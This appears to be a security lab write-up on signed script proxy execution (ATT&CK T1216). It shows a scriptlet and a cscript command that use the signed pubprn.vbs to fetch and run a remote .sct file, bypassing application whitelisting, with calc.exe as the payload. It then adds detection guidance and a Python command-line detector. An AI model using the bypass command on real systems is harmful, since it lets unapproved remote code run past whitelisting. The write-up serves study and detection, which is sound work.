pubprn.vbs Signed Script Code Execution
Signed Script Proxy Execution - bypass application whitelisting using pubprn.vbs
Execution
Using pubprn.vbs, we will execute code that launches calc.exe. First off, the scriptlet XML that the signed script will fetch and execute:
http://192.168.2.71/tools/mitre/proxy-script/proxy.sct

```xml
<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
</registration>

<script language="JScript">
<![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>

</scriptlet>
```
Then invoke the signed pubprn.vbs with the `script:` moniker pointing at the hosted .sct file:

```
cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http://192.168.2.71/tools/mitre/proxy-script/proxy.sct
```
Observations
Calc.exe is spawned by cscript.exe, which exits immediately and leaves calc.exe as an orphaned process.
Monitoring process command lines is useful for detecting this script being abused: legitimate use of pubprn.vbs takes a print server name and an LDAP path, so a second argument beginning with `script:` (particularly one pointing at a remote URL) is a strong indicator.
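As an added example (not part of the original page), the following Python script shows what that command-line monitoring could look like when run over process-creation events. It splits each command line the way a Windows script host would see it, checks that the host is cscript or wscript, locates the pubprn.vbs argument, and then inspects the positional arguments after it for a `script:` moniker; a remote target (http, https, ftp or a UNC path) is rated high, a local target medium, and ordinary printer-publishing usage is recorded as informational only. The sample command lines are constructed for the example; the IP and path in the second one are those from the page.

```python
import re
import shlex

# Constructed sample process-creation command lines (not from the original page).
SAMPLE_COMMAND_LINES = [
    # Legitimate use: publishing a printer to an LDAP directory.
    r'cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs printsrv01 "LDAP://CN=printsrv01,CN=Computers,DC=corp,DC=local"',
    # The pattern shown on the page: script: moniker pointing at a remote .sct file.
    r'cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http://192.168.2.71/tools/mitre/proxy-script/proxy.sct',
    # Variation: wscript host, upper-case moniker, local (constructed) path.
    r'wscript.exe C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost SCRIPT:C:\Users\Public\payload.sct',
    # Unrelated script execution that must not trigger.
    r'cscript //nologo C:\Scripts\inventory.vbs',
]

# Script hosts that can run pubprn.vbs (basename of the first token).
HOST_RE = re.compile(r'^(?:c|w)script(?:\.exe)?$', re.IGNORECASE)
# The signed script itself, wherever it is located on disk.
PUBPRN_RE = re.compile(r'(?:^|[\\/])pubprn\.vbs$', re.IGNORECASE)
# The COM script moniker that turns pubprn.vbs into a scriptlet loader.
MONIKER_RE = re.compile(r'^script:', re.IGNORECASE)
# Targets fetched from outside the host are the most suspicious.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def analyze_command_line(cmdline):
    """Return a finding dict for a pubprn.vbs invocation, or None if not applicable."""
    # posix=False keeps Windows backslashes literal and leaves quotes on tokens.
    tokens = shlex.split(cmdline, posix=False)
    if not tokens:
        return None
    host = tokens[0].strip('"').rsplit('\\', 1)[-1]
    if not HOST_RE.match(host):
        return None
    script_idx = next(
        (i for i, t in enumerate(tokens) if PUBPRN_RE.search(t.strip('"'))), None
    )
    if script_idx is None:
        return None
    for arg in tokens[script_idx + 1:]:
        arg = arg.strip('"')
        if MONIKER_RE.match(arg):
            target = arg[len('script:'):]
            remote = bool(REMOTE_RE.match(target)) or target.startswith('\\\\')
            return {
                'severity': 'high' if remote else 'medium',
                'script_host': host,
                'target': target,
                'remote': remote,
                'reason': 'pubprn.vbs invoked with a script: moniker',
            }
    # pubprn.vbs ran, but with ordinary arguments: worth logging, not alerting.
    return {'severity': 'info', 'script_host': host, 'target': None,
            'remote': False, 'reason': 'pubprn.vbs normal usage'}


def scan_command_lines(lines):
    """Return (command_line, finding) pairs for every alert-worthy invocation."""
    results = []
    for line in lines:
        finding = analyze_command_line(line)
        if finding and finding['severity'] in ('high', 'medium'):
            results.append((line, finding))
    return results


if __name__ == '__main__':
    for line, finding in scan_command_lines(SAMPLE_COMMAND_LINES):
        print(f"[{finding['severity'].upper()}] {finding['reason']} "
              f"(host={finding['script_host']}, target={finding['target']})")
        print(f"    {line}")
```

In a real deployment the same logic would be expressed as a SIEM or EDR rule over process-creation events (for example Sysmon event ID 1 or Windows Security event 4688 with command-line auditing enabled); the point the code makes is that the discriminating feature is the `script:` moniker in the argument position where an LDAP path belongs, not merely the presence of pubprn.vbs.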
References
Signed Script Proxy Execution, Technique T1216 - Enterprise | MITRE ATT&CK®